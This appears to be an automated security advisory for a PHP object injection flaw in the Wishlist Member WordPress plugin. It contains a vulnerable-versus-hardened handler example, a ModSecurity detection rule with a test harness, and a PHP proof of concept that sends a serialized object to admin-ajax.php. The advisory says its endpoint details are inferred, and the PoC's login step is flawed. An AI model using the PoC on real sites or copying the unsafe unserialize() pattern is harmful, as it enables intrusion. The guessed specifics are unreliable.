Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : April 6, 2026

CVE-2026-25445: Wishlist Member <= 3.29.0 – Authenticated (Subscriber+) PHP Object Injection (wishlist-member-x)

Severity High (CVSS 7.5)
CWE 502
Vulnerable Version 3.29.0
Patched Version
Disclosed March 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25445 (metadata-based):
The Wishlist Member plugin for WordPress versions up to and including 3.29.0 contains an authenticated PHP object injection vulnerability. Attackers with subscriber-level access or higher can exploit this flaw by submitting malicious serialized data. The CVSS score of 7.5 reflects a high-impact vulnerability with significant confidentiality, integrity, and availability consequences, though exploitation requires a secondary gadget chain.

Atomic Edge research infers the root cause is insecure deserialization of user-controlled input. The CWE-502 classification indicates that the plugin passes untrusted data to unserialize(); without a code diff, this is inferred from the CWE and the description rather than confirmed. The vulnerable code likely resides in an AJAX handler, REST endpoint, or form processing function that receives serialized data from authenticated users. The plugin fails to validate or sanitize this input before deserialization.

Exploitation requires an authenticated attacker to send a crafted serialized object to a specific plugin endpoint. Based on WordPress plugin patterns, the attack vector is likely a POST request to /wp-admin/admin-ajax.php with an action parameter containing a plugin-specific hook like wlmapi_* or wishlistmember_*. The payload would be a serialized PHP object placed in a POST parameter such as data or settings. Attackers must chain this with a POP gadget from another plugin or theme to achieve code execution.

Remediation requires replacing the insecure unserialize() call with a safe alternative. Developers should implement strict type checking and use JSON decoding for structured data. Input validation must reject any serialized PHP objects. The patched version should also implement proper capability checks for the affected endpoint, though subscriber access appears intentional for the feature.

Successful exploitation leads to arbitrary object injection in the application context. With a suitable POP chain present on the target system, attackers can achieve remote code execution, file deletion, or sensitive data retrieval. The absence of a known POP chain in the core plugin reduces the immediate risk, but the flaw remains a latent entry point that any gadget chain introduced later by another plugin or theme can complete. This vulnerability bypasses standard WordPress security controls by operating through authenticated, intended functionality.
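The vulnerable pattern and the remediation described above, side by side as an added example that is not code from the Wishlist Member plugin or from this advisory: a minimal admin-ajax.php handler of the kind the analysis describes, first as the insecure unserialize() call and then hardened with JSON decoding and allow-list validation. The hook name wlm_example_save_settings, the option name and the settings keys are hypothetical placeholders.

```php
<?php
// Added example, not code from the Wishlist Member plugin or this advisory:
// a minimal admin-ajax.php handler in the shape the analysis describes, first
// with the vulnerable pattern, then hardened. The hook, option and settings
// key names are hypothetical placeholders.

// VULNERABLE: untrusted POST data is passed straight to unserialize(), so any
// class with a __wakeup()/__destruct() gadget loaded on the site is reachable.
function wlm_example_save_settings_vulnerable() {
    $settings = unserialize( wp_unslash( $_POST['data'] ?? '' ) );
    update_option( 'wlm_example_settings', $settings );
    wp_send_json_success();
}

// HARDENED: the endpoint keeps its subscriber-level access (the feature
// intends it) but adds a nonce check, exchanges structured data as JSON
// and accepts only allow-listed keys carrying the scalar type each needs.
function wlm_example_save_settings_hardened() {
    check_ajax_referer( 'wlm_example_settings', 'nonce' );
    if ( ! current_user_can( 'read' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $decoded  = json_decode( wp_unslash( $_POST['data'] ?? '' ), true ); // assoc arrays, never objects
    $settings = is_array( $decoded ) ? wlm_example_validate_settings( $decoded ) : null;
    if ( null === $settings ) {
        wp_send_json_error( 'invalid payload', 400 );
    }
    update_option( 'wlm_example_settings', $settings );
    wp_send_json_success();
}

// Allow-list validation: an unknown key, a nested value or a wrong type
// rejects the whole request instead of being silently coerced.
function wlm_example_validate_settings( array $in ) {
    $allowed = array( 'label' => 'is_string', 'limit' => 'is_int', 'enabled' => 'is_bool' );
    $out     = array();
    foreach ( $in as $key => $value ) {
        if ( ! isset( $allowed[ $key ] ) || ! $allowed[ $key ]( $value ) ) {
            return null;
        }
        $out[ $key ] = is_string( $value ) ? sanitize_text_field( $value ) : $value;
    }
    return $out;
}

// If legacy clients must keep sending PHP-serialized data, the narrowest
// stopgap is unserialize( $raw, array( 'allowed_classes' => false ) ) (PHP 7+),
// which turns every object into __PHP_Incomplete_Class; JSON remains the fix.
add_action( 'wp_ajax_wlm_example_save_settings', 'wlm_example_save_settings_hardened' );
```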

ModSecurity Protection Against This CVE

Below is our ModSecurity-compatible rule for this CVE. Because the analysis is metadata-based, the endpoint, action prefix and parameter shape the rule matches are inferred from plugin naming conventions; treat it as a stopgap that narrows exposure until the plugin is updated, not as a replacement for the fix.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-25445 (metadata-based)
# This rule blocks exploitation of the PHP object injection vulnerability in Wishlist Member plugin.
# It targets the likely AJAX endpoint with specific parameter patterns for serialized objects.
# Chain: admin-ajax.php request -> plugin-prefixed action -> any POST value carrying a serialized
# object (O:) or Serializable (C:) header, top-level or nested after ';' or '{'. Bare serialized
# arrays/strings are deliberately not matched: they carry no gadget and occur in legitimate data.
# PHP's markers are case-sensitive, so no t:lowercase is applied before the match.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
  "id:2544501,phase:2,deny,status:403,chain,msg:'CVE-2026-25445 via Wishlist Member AJAX - PHP Object Injection',severity:'CRITICAL',tag:'CVE-2026-25445',tag:'wordpress',tag:'wishlist-member',tag:'php-object-injection'"
  SecRule ARGS_POST:action "@rx ^(wlm_|wlmapi_|wishlist_member_|wishlistmember_)" "chain"
    SecRule ARGS_POST "@rx (^|[;{])[OC]:[0-9]+:\"" \
      "t:none,t:urlDecodeUni"

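To confirm a rule of this shape does what its comments claim before it is deployed, here is an added example that is not part of the Atomic Edge rule set: the chain's three conditions emulated in PHP and run over constructed POST bodies. It assumes a root-installed WordPress (exact path match on admin-ajax.php) and the action-name prefixes the analysis names; all sample values are constructed.

```php
<?php
// Added example, not part of the Atomic Edge rule set: the chain's three
// conditions emulated in PHP and run over constructed POST bodies, so that
// the rule is known to fire on the payload shapes the analysis describes and
// to stay quiet on ordinary form data before it is deployed.

// Marker pattern for the last rule in the chain: a serialized object (O:) or
// Serializable (C:) header, top-level or nested after ';' or '{'. PHP's markers
// are case-sensitive, so no lowercase transformation may run before this match.
const WLM_OBJECT_RE = '/(^|[;{])[OC]:[0-9]+:"/';
const WLM_ACTION_RE = '/^(wlm_|wlmapi_|wishlist_member_|wishlistmember_)/';

function wlm_value_has_object( string $value ): bool {
    // ARGS_POST reaches the rule already URL-decoded once by the engine;
    // t:urlDecodeUni decodes a second time, which urldecode() emulates here.
    return preg_match( WLM_OBJECT_RE, urldecode( $value ) ) === 1;
}

// Mirrors the chain: admin-ajax.php request, plugin-prefixed action, and at
// least one POST value carrying a serialized object (assumes a root install).
function wlm_rule_fires( string $uri, array $post ): bool {
    if ( $uri !== '/wp-admin/admin-ajax.php' ) { return false; }
    if ( preg_match( WLM_ACTION_RE, (string) ( $post['action'] ?? '' ) ) !== 1 ) { return false; }
    foreach ( $post as $value ) {
        if ( is_string( $value ) && wlm_value_has_object( $value ) ) { return true; }
    }
    return false;
}

// Constructed samples: [POST body, expected verdict, description]
$uri     = '/wp-admin/admin-ajax.php';
$samples = array(
    array( array( 'action' => 'wlm_api', 'data' => 'O:8:"stdClass":1:{s:4:"test";s:9:"injected";}' ), true,  'top-level object, as in the PoC' ),
    array( array( 'action' => 'wlm_api', 'data' => 'a:1:{i:0;O:8:"stdClass":0:{}}' ),                   true,  'object nested in a serialized array' ),
    array( array( 'action' => 'wlm_api', 'data' => 'O%3A8%3A%22stdClass%22%3A0%3A%7B%7D' ),            true,  'double-URL-encoded on the wire' ),
    array( array( 'action' => 'wlm_api', 'data' => 'a:1:{s:3:"foo";s:3:"bar";}' ),                      false, 'serialized array without objects' ),
    array( array( 'action' => 'wlm_api', 'data' => '{"label":"Gold","limit":5}' ),                      false, 'JSON settings, what a fixed handler accepts' ),
    array( array( 'action' => 'heartbeat', 'data' => 'O:8:"stdClass":0:{}' ),                           false, 'non-plugin action, outside the rule scope' ),
);

foreach ( $samples as list( $post, $expected, $desc ) ) {
    $got = wlm_rule_fires( $uri, $post );
    printf( "%s  %-45s -> %s\n", $got === $expected ? 'ok  ' : 'FAIL', $desc, $got ? 'blocked' : 'allowed' );
}
```

Every sample should print "ok"; a "FAIL" line means the deployed pattern has drifted from the behaviour the rule comments promise.
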
Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-25445 - Wishlist Member <= 3.29.0 - Authenticated (Subscriber+) PHP Object Injection
/*
 * Proof of Concept for CVE-2026-25445.
 * This script demonstrates the attack vector for authenticated PHP object injection.
 * The exact AJAX action and parameter names are inferred from plugin naming conventions.
 * A generic serialized payload is used, as no public POP chain is documented.
 * Requires valid subscriber credentials and a target with a compatible POP gadget.
 */

$target_url = 'https://target.site/wp-admin/admin-ajax.php';
$username = 'subscriber';
$password = 'password';

// Generic PHP object payload - would require a specific POP chain for effect
$malicious_object = 'O:8:"stdClass":1:{s:4:"test";s:9:"injected";}';

// Initialize cURL session for authentication
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');

// First, authenticate to WordPress (simplified - real exploit would use proper nonce)
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);
$response = curl_exec($ch);

// Check authentication success (basic check)
if (strpos($response, 'dashboard') === false && strpos($response, 'admin-ajax') === false) {
    die('Authentication failed. Check credentials.');
}

// Send exploit payload to suspected AJAX endpoint
// Inferred action name based on plugin slug 'wishlist-member-x'
$exploit_data = array(
    'action' => 'wlm_api',
    'data' => $malicious_object,
    'cmd' => 'update_settings'  // Common parameter in membership plugins
);

curl_setopt($ch, CURLOPT_POSTFIELDS, $exploit_data);
$exploit_response = curl_exec($ch);
curl_close($ch);

// Analyze response for signs of successful injection
if ($exploit_response === false) {
    echo 'Request failed.';
} else {
    echo 'Payload sent. Response length: ' . strlen($exploit_response) . "\n";
    // In a real exploit, the response might contain error messages or serialized data
    echo 'Response preview: ' . substr($exploit_response, 0, 200) . "\n";
}
?>
